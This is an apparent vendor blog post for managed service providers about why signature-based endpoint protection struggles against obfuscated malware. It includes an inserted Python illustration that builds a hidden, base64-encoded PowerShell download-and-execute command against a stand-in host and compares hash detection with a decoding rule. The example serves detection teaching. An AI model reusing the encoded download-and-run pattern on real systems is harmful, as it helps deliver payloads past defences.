With so many types of solutions designed to secure your customers’ endpoints from cyberattack, it may be time to take a step back and see if there’s a better way.
The reality for nearly every MSP offering some form of cybersecurity services – whether it be as simple as protecting endpoints as part of an RMM service, or as a full-blown layered cybersecurity offering – is that you want to employ solutions with the highest efficacy to minimize customer downtime and the amount of tech resources consumed.
You likely already have some form of endpoint security solution in place; it probably goes by any one of the buzzwordy terms such as antivirus, anti-malware, endpoint protection, endpoint detection, etc. What’s actually less important is the way the solution is described, and instead your focus should be on how the solution prevents cyberattacks.
Regardless of what you have in place today, there are three reasons why you should at the very least spend a few cycles learning about the latest ways to protect endpoints – all in the name of keeping your customers secure and productive.
1. Cyberattacks Are Increasingly Becoming More Sophisticated
There are a number of ways malware is detected – whether it be based on a file hash, process behavior, or rules. But threat actors know this and are taking steps to make it more and more difficult for their wares to be detected. Take the example of a recent attack that aimed to install Cobalt Strike Beacon for use in a subsequent attack. In that attack, there were six different files used as droppers and/or payloads – each using some form of obfuscation to avoid detection. The scripting languages used are not only native to the endpoint (e.g., PowerShell on a Windows endpoint), but are so powerful in nature that the script itself can be used to help threat actors determine whether it’s “safe” to run while evading detection.
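The point above, that a hash-based signature breaks as soon as a dropper is trivially re-obfuscated while a rule on what the decoded script actually does keeps matching, as an added defender-side illustration that is not code from the original article. The command lines, hostname (`example.invalid`), hash set and rule are all constructed for the example, not real indicators.

```python
import base64
import hashlib
import re

# Constructed sample: the same encoded PowerShell invocation twice, the second
# differing only by one extra space inside the script before encoding.
# (-EncodedCommand takes base64 of the UTF-16LE bytes of the script.)
def encode_ps(script: str) -> str:
    return base64.b64encode(script.encode("utf-16-le")).decode()

SCRIPT_A = "Invoke-WebRequest http://example.invalid/a.ps1 | Invoke-Expression"
SCRIPT_B = "Invoke-WebRequest  http://example.invalid/a.ps1 | Invoke-Expression"

CMD_A = "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_ps(SCRIPT_A)
CMD_B = "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_ps(SCRIPT_B)

# Hash-based detection: a constructed "known bad" set containing only CMD_A.
KNOWN_BAD_HASHES = {hashlib.sha256(CMD_A.encode()).hexdigest()}

def hash_detect(cmdline: str) -> bool:
    return hashlib.sha256(cmdline.encode()).hexdigest() in KNOWN_BAD_HASHES

# Rule-based detection: decode the encoded command first, then match on
# the behaviour (download piped straight into Invoke-Expression).
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
RULES = [
    re.compile(r"Invoke-WebRequest.*\|\s*(?:Invoke-Expression|iex)\b", re.I),
]

def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries one, else None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def rule_detect(cmdline: str) -> bool:
    text = decode_encoded_command(cmdline) or cmdline
    return any(rule.search(text) for rule in RULES)

if __name__ == "__main__":
    for name, cmd in (("A", CMD_A), ("B", CMD_B)):
        print(name, "hash:", hash_detect(cmd), "rule:", rule_detect(cmd))
```

Hash detection flags only the exact sample it has seen; the rule flags both variants and still ignores a benign encoded or plain command line.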
2. Threat Actors Are Testing Their Wares Against Commodity Solutions
Like any good development effort, your QA team is going to test the final product in a real environment to see if the desired outcomes occur. In the case of droppers, encoding/decoding efforts, and launched payloads, testing is much more detailed than simply determining if everything runs on the endpoint’s operating system; much of the testing involves launching a simulated attack against an endpoint running common endpoint security solutions. This way, threat actors can see if they can attack by stealth and, if not, make changes until the solution no longer detects them.
3. There Are Newer Technologies Out That Do a Better Job
One reason the previous two points are a reality today is that the security solutions currently in place – perhaps even in your customers’ environments – rely on detection technologies that are either universally seen as legacy or are still being touted as cutting-edge when the bad guys already know better.
Even solutions flaunting their use of machine learning may not be able to keep up, despite being much better than their predecessors, as threats continue to evolve in response to detection capabilities.
Reconsidering Your Endpoint Protection
So, rather than settling for an endpoint security solution that promotes the latest and greatest detection buzzwords, or – quite frankly – even one highlighting a high detection rate, it may be time to stop and think about what you want as an MSP from your endpoint protection.
Doing so will obviously start with requirements such as stopping malware from running. Sure, that’s definitely important. But then you need to add in the operational needs you have of a solution: things like not needing to continually update the detection engine, and minimizing false positives. To achieve these wants, it’s necessary to stop looking at solution types and start looking at the underlying detection methods, to determine which ones keep their ability to detect attacks over time, given that attacks will continue to evolve while the detection method won’t.
To learn more about the various types of detection methods, how they work, and how well they stack up to an evolving attacker, check out the white paper Protecting the Endpoint: Deep Learning vs. EDR vs. Antivirus.